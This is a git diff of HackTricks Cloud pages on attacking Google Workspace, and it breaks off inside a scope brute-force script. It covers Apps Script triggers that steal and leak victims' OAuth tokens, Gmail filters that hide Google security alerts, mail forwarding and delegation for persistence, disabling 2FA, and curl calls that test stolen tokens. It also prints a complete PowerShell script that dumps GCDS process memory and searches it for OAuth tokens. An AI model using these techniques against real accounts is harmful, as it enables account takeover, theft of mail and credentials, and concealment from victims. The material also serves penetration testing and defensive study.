+Once the App is read, click on **⏰ Triggers** to create a trigger. As **function** ro tun choose **`getToken`**, runs at deployment **`Head`**, in event source select **`From spreadsheet`** and event type select **`On open`** or **`On edit`** (according to your needs) and save.
+
+Note that you can check the **runs of the App Scripts in the Executions tab** if you want to debug something.
+
+### Sharing
+
+In order to **trigger** the **App Script** the victim needs to connect with **Editor Access**.
+
+> [!TIP]
+> The **token** used to execute the **App Script** will be the one of the **creator of the trigger**, even if the file is opened as Editor by other users.
+
+### Abusing Shared With Me documents
+
+> [!CAUTION]
+> If someone **shared with you a document with App Scripts and a trigger using the Head** of the App Script (not a fixed deployment), you can modify the App Script code (adding for example the steal token functions), access it, and the **App Script will be executed with the permissions of the user that shared the document with you**! (note that the owners OAuth token will have as access scopes the ones given when the trigger was created).
+>
+> A **notification will be sent to the creator of the script indicating that someone modified the script** (What about using gmail permissions to generate a filter to prevent the alert?)
+
+> [!TIP]
+> If an **attacker modifies the scopes of the App Script** the updates **won't be applied** to the document until a **new trigger** with the changes is created. Therefore, an attacker won't be able to steal the owners creator token with more scopes than the one he set in the trigger he created.
+
+### Copying instead of sharing
+
+When you create a link to share a document a link similar to this one is created: `https://docs.google.com/spreadsheets/d/1i5[...]aIUD/edit`\
+If you **change** the ending **"/edit"** for **"/copy"**, instead of accessing it google will ask you if you want to **generate a copy of the document:**
+
+

+
+If the user copies it an access it both the **contents of the document and the App Scripts will be copied**, however the **triggers are not**, therefore **nothing will be executed**.
+
+### Sharing as Web Application
+
+Note that it's also possible to **share an App Script as a Web application** (in the Editor of the App Script, deploy as a Web application), but an alert such as this one will appear:
+
+

+
+Followed by the **typical OAuth prompt asking** for the needed permissions.
+
+### Testing
+
+You can test a gathered token to list emails with:
+
+```bash
+curl -X GET "https://www.googleapis.com/gmail/v1/users//messages" \
+-H "Authorization: Bearer "
+```
+
+List calendar of the user:
+
+```bash
+curl -H "Authorization: Bearer $OAUTH_TOKEN" \
+     -H "Accept: application/json" \
+     "https://www.googleapis.com/calendar/v3/users/me/calendarList"
+```
+
+## App Script as Persistence
+
+One option for persistence would be to **create a document and add a trigger for the the getToken** function and share the document with the attacker so every-time the attacker opens the file he **exfiltrates the token of the victim.**
+
+It's also possible to create an App Script and make it trigger every X time (like every minute, hour, day...). An attacker that has **compromised credentials or a session of a victim could set an App Script time trigger and leak a very privileged OAuth token every day**:
+
+Just create an App Script, go to Triggers, click on Add Trigger, and select as event source Time-driven and select the options that better suits you:
+
+

+
+> [!CAUTION]
+> This will create a security alert email and a push message to your mobile alerting about this.
+
+### Shared Document Unverified Prompt Bypass
+
+Moreover, if someone **shared** with you a document with **editor access**, you can generate **App Scripts inside the document** and the **OWNER (creator) of the document will be the owner of the App Script**.
+
+> [!WARNING]
+> This means, that the **creator of the document will appear as creator of any App Script** anyone with editor access creates inside of it.
+>
+> This also means that the **App Script will be trusted by the Workspace environment** of the creator of the document.
+
+> [!CAUTION]
+> This also means that if an **App Script already existed** and people have **granted access**, anyone with **Editor** permission on the doc can **modify it and abuse that access.**\
+> To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags).
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/workspace-security/gws-persistence.md b/src/pentesting-cloud/workspace-security/gws-persistence.md
new file mode 100644
index 000000000..3dd28ae67
--- /dev/null
+++ b/src/pentesting-cloud/workspace-security/gws-persistence.md
@@ -0,0 +1,182 @@
+# GWS - Persistence
+
+{{#include ../../banners/hacktricks-training.md}}
+
+> [!CAUTION]
+> All the actions mentioned in this section that change setting will generate a **security alert to the email and even a push notification to any mobile synced** with the account.
+
+## **Persistence in Gmail**
+
+- You can create **filters to hide** security notifications from Google
+  - `from: (no-reply@accounts.google.com) "Security Alert"`
+  - This will prevent security emails to reach the email (but won't prevent push notifications to the mobile)
+
+

+
+Steps to create a gmail filter
+
+(Instructions from [**here**](https://support.google.com/mail/answer/6579))
+
+1. Open [Gmail](https://mail.google.com/).
+2. In the search box at the top, click Show search options ![photos tune](https://lh3.googleusercontent.com/cD6YR_YvqXqNKxrWn2NAWkV6tjJtg8vfvqijKT1_9zVCrl2sAx9jROKhLqiHo2ZDYTE=w36) .
+3. Enter your search criteria. If you want to check that your search worked correctly, see what emails show up by clicking **Search**.
+4. At the bottom of the search window, click **Create filter**.
+5. Choose what you’d like the filter to do.
+6. Click **Create filter**.
+
+Check your current filter (to delete them) in [https://mail.google.com/mail/u/0/#settings/filters](https://mail.google.com/mail/u/0/#settings/filters)
+
+

+
+

+
+- Create **forwarding address to forward sensitive information** (or everything) - You need manual access.
+  - Create a forwarding address in [https://mail.google.com/mail/u/2/#settings/fwdandpop](https://mail.google.com/mail/u/2/#settings/fwdandpop)
+  - The receiving address will need to confirm this
+  - Then, set to forward all the emails while keeping a copy (remember to click on save changes):
+
+

+
+It's also possible create filters and forward only specific emails to the other email address.
+
+## App passwords
+
+If you managed to **compromise a google user session** and the user had **2FA**, you can **generate** an [**app password**](https://support.google.com/accounts/answer/185833?hl=en) (follow the link to see the steps). Note that **App passwords are no longer recommended by Google and are revoked** when the user **changes his Google Account password.**
+
+**Even if you have an open session you will need to know the password of the user to create an app password.**
+
+> [!NOTE]
+> App passwords can **only be used with accounts that have 2-Step Verification** turned on.
+
+## Change 2-FA and similar
+
+It's also possible to **turn off 2-FA or to enrol a new device** (or phone number) in this page [**https://myaccount.google.com/security**](https://myaccount.google.com/security)**.**\
+**It's also possible to generate passkeys (add your own device), change the password, add mobile numbers for verification phones and recovery, change the recovery email and change the security questions).**
+
+> [!CAUTION]
+> To **prevent security push notifications** to reach the phone of the user, you could **sign his smartphone out** (although that would be weird) because you cannot sign him in again from here.
+>
+> It's also possible to **locate the device.**
+
+**Even if you have an open session you will need to know the password of the user to change these settings.**
+
+## Persistence via OAuth Apps
+
+If you have **compromised the account of a user,** you can just **accept** to grant all the possible permissions to an **OAuth App**. The only problem is that Workspace can be configure to **disallow unreviewed external and/or internal OAuth apps.**\
+It is pretty common for Workspace Organizations to not trust by default external OAuth apps but trust internal ones, so if you have **enough permissions to generate a new OAuth application** inside the organization and external apps are disallowed, generate it and **use that new internal OAuth app to maintain persistence**.
+
+Check the following page for more information about OAuth Apps:
+
+{{#ref}}
+gws-google-platforms-phishing/
+{{#endref}}
+
+## Persistence via delegation
+
+You can just **delegate the account** to a different account controlled by the attacker (if you are allowed to do this). In Workspace **Organizations** this option must be **enabled**. It can be disabled for everyone, enabled from some users/groups or for everyone (usually it's only enabled for some users/groups or completely disabled).
+
+

+
+If you are a Workspace admin check this to enable the feature
+
+(Information [copied form the docs](https://support.google.com/a/answer/7223765))
+
+As an administrator for your organization (for example, your work or school), you control whether users can delegate access to their Gmail account. You can let everyone have the option to delegate their account. Or, only let people in certain departments set up delegation. For example, you can:
+
+- Add an administrative assistant as a delegate on your Gmail account so they can read and send email on your behalf.
+- Add a group, such as your sales department, in Groups as a delegate to give everyone access to one Gmail account.
+
+Users can only delegate access to another user in the same organization, regardless of their domain or their organizational unit.
+
+#### Delegation limits & restrictions
+
+- **Allow users to grant their mailbox access to a Google group** option: To use this option, it must be enabled for the OU of the delegated account and for each group member's OU. Group members that belong to an OU without this option enabled can't access the delegated account.
+- With typical use, 40 delegated users can access a Gmail account at the same time. Above-average use by one or more delegates might reduce this number.
+- Automated processes that frequently access Gmail might also reduce the number of delegates who can access an account at the same time. These processes include APIs or browser extensions that access Gmail frequently.
+- A single Gmail account supports up to 1,000 unique delegates. A group in Groups counts as one delegate toward the limit.
+- Delegation does not increase the limits for a Gmail account. Gmail accounts with delegated users have the standard Gmail account limits and policies. For details, visit [Gmail limits and policies](https://support.google.com/a/topic/28609).
+
+#### Step 1: Turn on Gmail delegation for your users
+
+**Before you begin:** To apply the setting for certain users, put their accounts in an [organizational unit](https://support.google.com/a/topic/1227584).
+
+1.  [Sign in](https://admin.google.com/) to your [Google Admin console](https://support.google.com/a/answer/182076).
+
+    Sign in using an _administrator account_, not your current account CarlosPolop@gmail.com
+
+2.  In the Admin console, go to Menu ![](https://storage.googleapis.com/support-kms-prod/JxKYG9DqcsormHflJJ8Z8bHuyVI5YheC0lAp)![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)![](https://storage.googleapis.com/support-kms-prod/ocGtUSENh4QebLpvZcmLcNRZyaTBcolMRSyl) **Apps**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Google Workspace**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**Gmail**![and then](https://storage.googleapis.com/support-kms-prod/Th2Tx0uwPMOhsMPn7nRXMUo3vs6J0pto2DTn)**User settings**.
+3.  To apply the setting to everyone, leave the top organizational unit selected. Otherwise, select a child [organizational unit](https://support.google.com/a/topic/1227584).
+4.  Click **Mail delegation**.
+5.  Check the **Let users delegate access to their mailbox to other users in the domain** box.
+6.  (Optional) To let users specify what sender information is included in delegated messages sent from their account, check the **Allow users to customize this setting** box.
+7.  Select an option for the default sender information that's included in messages sent by delegates:
+    - **Show the account owner and the delegate who sent the email**—Messages include the email addresses of the Gmail account owner and the delegate.
+    - **Show the account owner only**—Messages include the email address of only the Gmail account owner. The delegate email address is not included.
+8.  (Optional) To let users add a group in Groups as a delegate, check the **Allow users to grant their mailbox access to a Google group** box.
+9.  Click **Save**. If you configured a child organizational unit, you might be able to **Inherit** or **Override** a parent organizational unit's settings.
+10. (Optional) To turn on Gmail delegation for other organizational units, repeat steps 3–9.
+
+Changes can take up to 24 hours but typically happen more quickly. [Learn more](https://support.google.com/a/answer/7514107)
+
+#### Step 2: Have users set up delegates for their accounts
+
+After you turn on delegation, your users go to their Gmail settings to assign delegates. Delegates can then read, send, and receive messages on behalf of the user.
+
+For details, direct users to [Delegate and collaborate on email](https://support.google.com/a/users/answer/138350).
+
+

+
+

+
+From a regular suer, check here the instructions to try to delegate your access
+
+(Info copied [**from the docs**](https://support.google.com/mail/answer/138350))
+
+You can add up to 10 delegates.
+
+If you're using Gmail through your work, school, or other organization:
+
+- You can add up to 1000 delegates within your organization.
+- With typical use, 40 delegates can access a Gmail account at the same time.
+- If you use automated processes, such as APIs or browser extensions, a few delegates can access a Gmail account at the same time.
+
+1. On your computer, open [Gmail](https://mail.google.com/). You can't add delegates from the Gmail app.
+2. In the top right, click Settings ![Settings](https://lh3.googleusercontent.com/p3J-ZSPOLtuBBR_ofWTFDfdgAYQgi8mR5c76ie8XQ2wjegk7-yyU5zdRVHKybQgUlQ=w36-h36) ![and then](https://lh3.googleusercontent.com/3_l97rr0GvhSP2XV5OoCkV2ZDTIisAOczrSdzNCBxhIKWrjXjHucxNwocghoUa39gw=w36-h36) **See all settings**.
+3. Click the **Accounts and Import** or **Accounts** tab.
+4. In the "Grant access to your account" section, click **Add another account**. If you’re using Gmail through your work or school, your organization may restrict email delegation. If you don’t see this setting, contact your admin.
+   - If you don't see Grant access to your account, then it's restricted.
+5. Enter the email address of the person you want to add. If you’re using Gmail through your work, school, or other organization, and your admin allows it, you can enter the email address of a group. This group must have the same domain as your organization. External members of the group are denied delegation access.\
+   \
+   **Important:** If the account you delegate is a new account or the password was reset, the Admin must turn off the requirement to change password when you first sign in.
+
+   - [Learn how an Admin can create a user](https://support.google.com/a/answer/33310).
+   - [Learn how an Admin can reset passwords](https://support.google.com/a/answer/33319).
+
+   6\. Click **Next Step** ![and then](https://lh3.googleusercontent.com/QbWcYKta5vh_4-OgUeFmK-JOB0YgLLoGh69P478nE6mKdfpWQniiBabjF7FVoCVXI0g=h36) **Send email to grant access**.
+
+   The person you added will get an email asking them to confirm. The invitation expires after a week.
+
+   If you added a group, all group members will become delegates without having to confirm.
+
+   Note: It may take up to 24 hours for the delegation to start taking effect.
+
+

+
+## Persistence via Android App
+
+If you have a **session inside victims google account** you can browse to the **Play Store** and might be able to **install malware** you have already uploaded to the store directly **to the phone** to maintain persistence and access the victims phone.
+
+## **Persistence via** App Scripts
+
+You can create **time-based triggers** in App Scripts, so if the App Script is accepted by the user, it will be **triggered** even **without the user accessing it**. For more information about how to do this check:
+
+{{#ref}}
+gws-google-platforms-phishing/gws-app-scripts.md
+{{#endref}}
+
+## References
+
+- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/workspace-security/gws-post-exploitation.md b/src/pentesting-cloud/workspace-security/gws-post-exploitation.md
similarity index 56%
rename from pentesting-cloud/workspace-security/gws-post-exploitation.md
rename to src/pentesting-cloud/workspace-security/gws-post-exploitation.md
index a1a3cf4a1..411fcca77 100644
--- a/pentesting-cloud/workspace-security/gws-post-exploitation.md
+++ b/src/pentesting-cloud/workspace-security/gws-post-exploitation.md
@@ -1,19 +1,6 @@
 # GWS - Post Exploitation
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
 
 ## Google Groups Privesc
 
@@ -28,9 +15,9 @@ If you managed to **compromise a google user session**, from [**https://groups.g
 
 ## GCP <--> GWS Pivoting
 
-{% content-ref url="../gcp-security/gcp-to-workspace-pivoting/" %}
-[gcp-to-workspace-pivoting](../gcp-security/gcp-to-workspace-pivoting/)
-{% endcontent-ref %}
+{{#ref}}
+../gcp-security/gcp-to-workspace-pivoting/
+{{#endref}}
 
 ## Takeout - Download Everything Google Knows about an account
 
@@ -42,7 +29,7 @@ If an organization has **Google Vault enabled**, you might be able to access [**
 
 ## Contacts download
 
-From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es\&tab=mC) you can download all the **contacts** of the user.
+From [**https://contacts.google.com**](https://contacts.google.com/u/1/?hl=es&tab=mC) you can download all the **contacts** of the user.
 
 ## Cloudsearch
 
@@ -62,8 +49,8 @@ For sake of simplicity, most of the people will generate and share a link instea
 
 Some proposed ways to find all the documents:
 
-* Search in internal chat, forums...
-* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
+- Search in internal chat, forums...
+- **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)
 
 ## **Keep Notes**
 
@@ -81,20 +68,7 @@ You can also find emails by searching through all the user's invoices in [**http
 
 ## References
 
-* [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
-* [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
+- [https://www.youtube-nocookie.com/embed/6AsVUS79gLw](https://www.youtube-nocookie.com/embed/6AsVUS79gLw) - Matthew Bryant - Hacking G Suite: The Power of Dark Apps Script Magic
+- [https://www.youtube.com/watch?v=KTVHLolz6cE](https://www.youtube.com/watch?v=KTVHLolz6cE) - Mike Felch and Beau Bullock - OK Google, How do I Red Team GSuite?
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../banners/hacktricks-training.md}}
diff --git a/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md
new file mode 100644
index 000000000..30dd96b90
--- /dev/null
+++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/README.md
@@ -0,0 +1,58 @@
+# GWS - Workspace Sync Attacks (GCPW, GCDS, GPS, Directory Sync with AD & EntraID)
+
+{{#include ../../../banners/hacktricks-training.md}}
+
+## GCPW - Google Credential Provider for Windows
+
+This is the single sign-on that Google Workspaces provides so users can login in their Windows PCs using **their Workspace credentials**. Moreover, this will store **tokens** to access Google Workspace in some places in the PC: Disk, memory & the registry... it's even possible to obtain the **clear text password**.
+
+> [!TIP]
+> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCPW**, get information about the configuration and **even tokens**.
+
+Find more information about this in:
+
+{{#ref}}
+gcpw-google-credential-provider-for-windows.md
+{{#endref}}
+
+## GCSD - Google Cloud Directory Sync
+
+This is a tool that can be used to **sync your active directory users and groups to your Workspace** (and not the other way around by the time of this writing).
+
+It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
+
+> [!TIP]
+> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
+
+Find more information about this in:
+
+{{#ref}}
+gcds-google-cloud-directory-sync.md
+{{#endref}}
+
+## GPS - Google Password Sync
+
+This is the binary and service that Google offers in order to **keep synchronized the passwords of the users between the AD** and Workspace. Every-time a user changes his password in the AD, it's set to Google.
+
+It gets installed in `C:\Program Files\Google\Password Sync` where you can find the binary `PasswordSync.exe` to configure it and `password_sync_service.exe` (the service that will continue running).
+
+> [!TIP]
+> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GPS**, get information about the configuration and **even the passwords and encrypted credentials**.
+
+Find more information about this in:
+
+{{#ref}}
+gps-google-password-sync.md
+{{#endref}}
+
+## Admin Directory Sync
+
+The main difference between this way to synchronize users with GCDS is that GCDS is done manually with some binaries you need to download and run while **Admin Directory Sync is serverless** managed by Google in [https://admin.google.com/ac/sync/externaldirectories](https://admin.google.com/ac/sync/externaldirectories).
+
+Find more information about this in:
+
+{{#ref}}
+gws-admin-directory-sync.md
+{{#endref}}
+
+{{#include ../../../banners/hacktricks-training.md}}
diff --git a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md
similarity index 65%
rename from pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md
rename to src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md
index a2f5e0f0e..47a7a9468 100644
--- a/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md
+++ b/src/pentesting-cloud/workspace-security/gws-workspace-sync-attacks-gcpw-gcds-gps-directory-sync-with-ad-and-entraid/gcds-google-cloud-directory-sync.md
@@ -1,19 +1,6 @@
 # GCDS - Google Cloud Directory Sync
 
-{% hint style="success" %}
-Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
-Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
-
-

-
-Support HackTricks
-
-* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
-* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.**
-* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
-
-

-{% endhint %}
+{{#include ../../../banners/hacktricks-training.md}}
 
 ## Basic Information
 
@@ -21,17 +8,15 @@ This is a tool that can be used to **sync your active directory users and groups
 
 It's interesting because it's a tool that will require the **credentials of a Workspace superuser and privileged AD user**. So, it might be possible to find it inside a domain server that would be synchronising users from time to time.
 
-{% hint style="info" %}
-To perform a **MitM** to the **`config-manager.exe`** binary just add the following line in the `config.manager.vmoptions` file: **`-Dcom.sun.net.ssl.checkRevocation=false`**
-{% endhint %}
+> [!NOTE]
+> To perform a **MitM** to the **`config-manager.exe`** binary just add the following line in the `config.manager.vmoptions` file: **`-Dcom.sun.net.ssl.checkRevocation=false`**
 
-{% hint style="success" %}
-Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
-{% endhint %}
+> [!TIP]
+> Note that [**Winpeas**](https://github.com/peass-ng/PEASS-ng/tree/master/winPEAS/winPEASexe) is capable to detect **GCDS**, get information about the configuration and **even the passwords and encrypted credentials**.
 
 Also note that GCDS won't synchronize passwords from AD to Workspace. If something it'll just generate random passwords for newly created users in Workspace as you can see in the following image:
 
-

+

 
 ### GCDS - Disk Tokens & AD Credentials
 
@@ -168,9 +153,8 @@ Write-Host "Decrypted Password: $decryptedPassword"
 
 
 
-{% hint style="info" %}
-Note that it's possible to check this information checking the java code of **`DirSync.jar`** from **`C:\Program Files\Google Cloud Directory Sync`** searching for the string `exportkeys` (as thats the cli param that the binary `upgrade-config.exe` expects to dump the keys).
-{% endhint %}
+> [!NOTE]
+> Note that it's possible to check this information checking the java code of **`DirSync.jar`** from **`C:\Program Files\Google Cloud Directory Sync`** searching for the string `exportkeys` (as thats the cli param that the binary `upgrade-config.exe` expects to dump the keys).
 
 Instead of using the powershell script, it's also possible to use the binary **`:\Program Files\Google Cloud Directory Sync\upgrade-config.exe`** with the param `-exportKeys` and get the **Key** and **IV** from the registry in hex and then just use some cyberchef with AES/CBC and that key and IV to decrypt the info.
 
@@ -184,74 +168,74 @@ I guess you could also find the AD configured credentials.
 Dump config-manager.exe processes and search tokens
 
 ```powershell
-# Define paths for Procdump and Strings utilities   
-$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"   
-$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"   
-$dumpFolder = "C:\Users\Public\dumps"   
- 
-# Regular expressions for tokens 
-$tokenRegexes = @( 
-    "ya29\.[a-zA-Z0-9_\.\-]{50,}", 
-    "1//[a-zA-Z0-9_\.\-]{50,}" 
+# Define paths for Procdump and Strings utilities
+$procdumpPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\procdump.exe"
+$stringsPath = "C:\Users\carlos_hacktricks\Desktop\SysinternalsSuite\strings.exe"
+$dumpFolder = "C:\Users\Public\dumps"
+
+# Regular expressions for tokens
+$tokenRegexes = @(
+    "ya29\.[a-zA-Z0-9_\.\-]{50,}",
+    "1//[a-zA-Z0-9_\.\-]{50,}"
 )
- 
-# Create a directory for the dumps if it doesn't exist   
-if (!(Test-Path $dumpFolder)) {   
-    New-Item -Path $dumpFolder -ItemType Directory   
-}   
- 
-# Get all Chrome process IDs   
-$chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id   
- 
-# Dump each Chrome process   
-foreach ($processId in $chromeProcesses) {   
-    Write-Output "Dumping process with PID: $processId"   
-    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"   
-}   
- 
-# Extract strings and search for tokens in each dump   
-Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {   
-    $dumpFile = $_.FullName   
-    $baseName = $_.BaseName 
-    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"   
-    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"   
- 
-    Write-Output "Extracting strings from $dumpFile"   
-    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile   
-    & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile   
- 
-    $outputFiles = @($asciiStringsFile, $unicodeStringsFile) 
- 
-    foreach ($file in $outputFiles) { 
-        foreach ($regex in $tokenRegexes) { 
- 
-            $matches = Select-String -Path $file -Pattern $regex -AllMatches 
- 
-            $uniqueMatches = @{} 
- 
-            foreach ($matchInfo in $matches) { 
-                foreach ($match in $matchInfo.Matches) { 
-                    $matchValue = $match.Value 
-                    if (-not $uniqueMatches.ContainsKey($matchValue)) { 
-                        $uniqueMatches[$matchValue] = @{ 
-                            LineNumber = $matchInfo.LineNumber 
-                            LineText   = $matchInfo.Line.Trim() 
-                            FilePath   = $matchInfo.Path 
-                        } 
-                    } 
-                } 
-            } 
- 
-            foreach ($matchValue in $uniqueMatches.Keys) { 
-                $info = $uniqueMatches[$matchValue] 
-                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)" 
-            } 
-        } 
- 
-        Write-Output "" 
-    } 
-} 
- 
+
+# Create a directory for the dumps if it doesn't exist
+if (!(Test-Path $dumpFolder)) {
+    New-Item -Path $dumpFolder -ItemType Directory
+}
+
+# Get all Chrome process IDs
+$chromeProcesses = Get-Process -Name "config-manager" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Id
+
+# Dump each Chrome process
+foreach ($processId in $chromeProcesses) {
+    Write-Output "Dumping process with PID: $processId"
+    & $procdumpPath -accepteula -ma $processId "$dumpFolder\chrome_$processId.dmp"
+}
+
+# Extract strings and search for tokens in each dump
+Get-ChildItem $dumpFolder -Filter "*.dmp" | ForEach-Object {
+    $dumpFile = $_.FullName
+    $baseName = $_.BaseName
+    $asciiStringsFile = "$dumpFolder\${baseName}_ascii_strings.txt"
+    $unicodeStringsFile = "$dumpFolder\${baseName}_unicode_strings.txt"
+
+    Write-Output "Extracting strings from $dumpFile"
+    & $stringsPath -accepteula -n 50 -nobanner $dumpFile > $asciiStringsFile
+    & $stringsPath -accepteula -n 50 -nobanner -u $dumpFile > $unicodeStringsFile
+
+    $outputFiles = @($asciiStringsFile, $unicodeStringsFile)
+
+    foreach ($file in $outputFiles) {
+        foreach ($regex in $tokenRegexes) {
+
+            $matches = Select-String -Path $file -Pattern $regex -AllMatches
+
+            $uniqueMatches = @{}
+
+            foreach ($matchInfo in $matches) {
+                foreach ($match in $matchInfo.Matches) {
+                    $matchValue = $match.Value
+                    if (-not $uniqueMatches.ContainsKey($matchValue)) {
+                        $uniqueMatches[$matchValue] = @{
+                            LineNumber = $matchInfo.LineNumber
+                            LineText   = $matchInfo.Line.Trim()
+                            FilePath   = $matchInfo.Path
+                        }
+                    }
+                }
+            }
+
+            foreach ($matchValue in $uniqueMatches.Keys) {
+                $info = $uniqueMatches[$matchValue]
+                Write-Output "Match found in file '$($info.FilePath)' on line $($info.LineNumber): $($info.LineText)"
+            }
+        }
+
+        Write-Output ""
+    }
+}
+
 Remove-Item -Path $dumpFolder -Recurse -Force
 ```
 
@@ -271,11 +255,10 @@ curl -s --data "client_id=118556098869.apps.googleusercontent.com" \
 
 ### GCDS - Scopes
 
-{% hint style="info" %}
-Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
-
-Also, the refresh token is not valid in every application.
-{% endhint %}
+> [!NOTE]
+> Note that even having a refresh token, it's not possible to request any scope for the access token as you can only requests the **scopes supported by the application where you are generating the access token**.
+>
+> Also, the refresh token is not valid in every application.
 
 By default GCSD won't have access as the user to every possible OAuth scope, so using the following script we can find the scopes that can be used with the `refresh_token` to generate an `access_token`:
 
@@ -284,7 +267,7 @@ By default GCSD won't have access as the user to every possible OAuth scope, so
 Bash script to brute-force scopes
 
 ```bash
-curl "https://developers.google.com/identity/protocols/oauth2/scopes" | grep -oE 'https://www.googleapis.com/auth/[a-zA-Z/\._\-]*' | sort -u | while read -r scope; do 
